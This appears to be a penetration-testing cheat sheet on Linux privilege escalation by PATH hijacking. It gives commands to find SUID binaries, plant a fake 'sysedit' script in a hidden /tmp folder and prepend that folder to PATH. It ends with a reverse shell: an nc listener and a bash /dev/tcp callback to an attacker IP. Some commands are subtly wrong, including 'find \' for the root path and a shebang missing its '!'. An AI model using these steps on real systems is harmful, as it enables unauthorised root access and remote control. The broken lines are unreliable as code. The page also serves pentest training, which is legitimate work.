Writable $PATH
Path Hijacking
Identify the SUID file
find \ -perm -4000 2>/dev/null
For example, we found a file called /usr/bin/sysedit
, and this binary is called from a random task or script that we control or we can execute.
Create a file with malicious content
We need to create a file with the same name as the SUID previously found:
mkdir /tmp/.my-things
cd !$
echo "#/bin/bash" > sysedit
echo "id > /tmp/.my-things/id.txt" >> sysedit
Update the $PATH variable
echo $PATH
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
export PATH=/tmp/.my-things:$PATH
echo $PATH
# /tmp/.my-things:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
With that, we are going to position our malicious folder (with the malicious file inside) as the first folder that the system will reach if the (in this case) sysedit
file is invoked.
We need to execute the task or service that is calling that file again. And instead of the normal execution, we are going to see:
ls /tmp/.my-things
# id.txt
If we want a Reverse Shell
In the attack machine, we are going to listen to any port:
nc -lnvp 4460
Now create the file with the connection towards the attacker listener:
echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4460 0>&1'" > sysedit
Last updated